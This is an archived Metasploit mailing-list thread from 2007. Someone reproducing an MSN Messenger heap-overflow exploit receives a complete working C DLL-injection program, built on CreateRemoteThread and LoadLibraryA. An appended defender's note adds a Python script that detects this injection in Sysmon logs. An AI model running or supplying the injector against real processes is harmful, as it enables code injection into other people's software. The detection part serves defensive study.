[framework] DLL Process Injection

Danux danuxx at gmail.com
Fri Sep 14 14:44:05 CDT 2007


Wonderfulllllllll!!!! That's what I was looking for.

Thanks, friends.

On 9/14/07, Pusscat <pusscat at metasploit.com> wrote:
> Try this:
>
> #include <windows.h>
> #include <stdlib.h>
> #include <stdio.h>
> #include <string.h>
>
> int main(int argc, char **argv) {
>     HANDLE processHandle = NULL;
>     HANDLE threadHandle = NULL;
>     LPVOID stringAddress = NULL;
>     LPCSTR dllName = NULL;
>     DWORD  pid;
>     SIZE_T dllNameLen;   /* length of the DLL path including the NUL terminator */
>
>     if (argc < 3) {
>         printf("injectDLL <dll to inject> <pid to inject into>\n\n");
>         return (0);
>     }
>
>     pid = strtoul(argv[2], NULL, 10);
>     dllName = argv[1];
>     dllNameLen = strlen(dllName) + 1;
>     printf("Injecting DLL %s into pid %lu... ", dllName, pid);
>
>     /* open the target process with full access */
>     if (!(processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid))) {
>         printf("OpenProcess() failed\n");
>         return (-1);
>     }
>     /* reserve room in the target for the DLL path; LoadLibraryA only
>        reads the string, so read/write protection is enough */
>     if (!(stringAddress = VirtualAllocEx(processHandle, NULL, dllNameLen,
>             MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE))) {
>         printf("VirtualAllocEx() failed.\n");
>         CloseHandle(processHandle);
>         return (-1);
>     }
>     /* copy the path, including its terminating NUL, into the target */
>     if (!WriteProcessMemory(processHandle, stringAddress, dllName,
>             dllNameLen, NULL)) {
>         printf("WriteProcessMemory() failed.\n");
>         VirtualFreeEx(processHandle, stringAddress, 0, MEM_RELEASE);
>         CloseHandle(processHandle);
>         return (-1);
>     }
>
>     /* kernel32.dll is mapped at the same base in every process of the same
>        bitness, so the local address of LoadLibraryA is valid in the target;
>        the new thread calls LoadLibraryA(stringAddress) inside the target */
>     if (!(threadHandle = CreateRemoteThread(processHandle, NULL, 0,
>             (LPTHREAD_START_ROUTINE)GetProcAddress(LoadLibrary("kernel32.dll"),
>                                                    "LoadLibraryA"),
>             stringAddress, 0, NULL))) {
>         printf("CreateRemoteThread() failed.\n");
>         VirtualFreeEx(processHandle, stringAddress, 0, MEM_RELEASE);
>         CloseHandle(processHandle);
>         return (-1);
>     }
>     printf("DLL Injected.\n");
>
>     CloseHandle(threadHandle);
>     CloseHandle(processHandle);
>
>     return (0);
> }
>
> ~ Puss
>
>
> -----Original Message-----
> From: Danux [mailto:danuxx at gmail.com]
> Sent: Friday, September 14, 2007 1:24 PM
> To: framework at metasploit.com
> Subject: [framework] DLL Process Injection
>
> Hi, I don't know if this is the right place to ask, but I know you have
> the skill to help me.
>
> Recently I was trying to reproduce a new exploit, I mean: MSN
> Messenger 7.x (8.0?) VIDEO Remote Heap Overflow Exploit,
>
> but following the instructions on milw0rm:
> http://www.milw0rm.com/sploits/08292007-exp_msn.rar
>
> they say I need to "inject the dll to msn messenger .... process."
>
> I know Metasploit already works that way, but I would like to learn how
> to do it manually.
>
> I have no skill in DLL programming or injection; do you have a
> tutorial or something like that to understand it?
>
> Thanks in advance.
>
> --
> Danux, CISSP
> Chief Information Security Officer
> Macula Security Consulting Group
> www.macula-group.com
>
>


-- 
Danux, CISSP
Chief Information Security Officer
Macula Security Consulting Group
www.macula-group.com
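As an added defender's-side note, not part of the original thread: the injector above leaves a distinctive trace, a thread created in another process whose entry point is kernel32!LoadLibraryA, which Sysmon records as Event ID 8 (CreateRemoteThread) with the StartModule/StartFunction fields. The script below is example code written for this page, not from the thread or Metasploit; the event records, process names and addresses are constructed samples, and `classify_remote_thread`/`find_injections` are hypothetical names. It also flags the related case of a remote thread whose start address is backed by no module.

```python
# Sysmon Event ID 8 ("CreateRemoteThread detected") records, reduced to the
# fields this check uses. All values below are constructed samples.
SYSMON_EVENTS = [
    # the pattern from the thread: remote thread started at kernel32!LoadLibraryA
    {"EventID": 8, "SourceImage": r"C:\tools\injectDLL.exe", "SourceProcessId": 4120,
     "TargetImage": r"C:\Program Files\MSN Messenger\msnmsgr.exe", "TargetProcessId": 2232,
     "StartModule": r"C:\Windows\System32\KERNEL32.DLL", "StartFunction": "LoadLibraryA",
     "StartAddress": "0x7C80AE40"},
    # remote thread whose start address is inside no loaded module
    {"EventID": 8, "SourceImage": r"C:\Users\bob\AppData\Local\Temp\a.exe", "SourceProcessId": 5012,
     "TargetImage": r"C:\Windows\explorer.exe", "TargetProcessId": 1488,
     "StartModule": "-", "StartFunction": "-", "StartAddress": "0x00E40000"},
    # benign: a debugger breaking into its debuggee via ntdll!DbgUiRemoteBreakin
    {"EventID": 8, "SourceImage": r"C:\Program Files\WinDbg\windbg.exe", "SourceProcessId": 3300,
     "TargetImage": r"C:\dev\app.exe", "TargetProcessId": 2100,
     "StartModule": r"C:\Windows\System32\ntdll.dll", "StartFunction": "DbgUiRemoteBreakin",
     "StartAddress": "0x7C9501F8"},
    # a different event type, ignored by the check
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "ProcessId": 700},
]

# LoadLibrary variants an injector can hand to CreateRemoteThread as the entry point
LOADLIB_FUNCS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}


def classify_remote_thread(ev):
    """Return a reason string if this Event 8 record looks like injection, else None."""
    if ev.get("EventID") != 8:
        return None
    func = ev.get("StartFunction", "-")
    module = ev.get("StartModule", "-")
    if func in LOADLIB_FUNCS:
        # the thread's entry point is LoadLibrary*, so its argument is a DLL
        # path the target process is being made to load (the injector above)
        return "remote thread entry is %s (DLL injection)" % func
    if module == "-":
        # no module backs the start address: code was written into the target
        return "remote thread starts in unbacked memory"
    return None


def find_injections(events):
    """Return (source image, target image, reason) for each suspicious Event 8."""
    hits = []
    for ev in events:
        reason = classify_remote_thread(ev)
        if reason:
            hits.append((ev["SourceImage"], ev["TargetImage"], reason))
    return hits


if __name__ == "__main__":
    for src, dst, why in find_injections(SYSMON_EVENTS):
        print("%s -> %s: %s" % (src, dst, why))
```

On a real host the records would come from the Sysmon operational log (Event ID 8 needs a CreateRemoteThread rule in the Sysmon configuration); the debugger case shows why the check keys on the start function rather than on cross-process thread creation alone.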


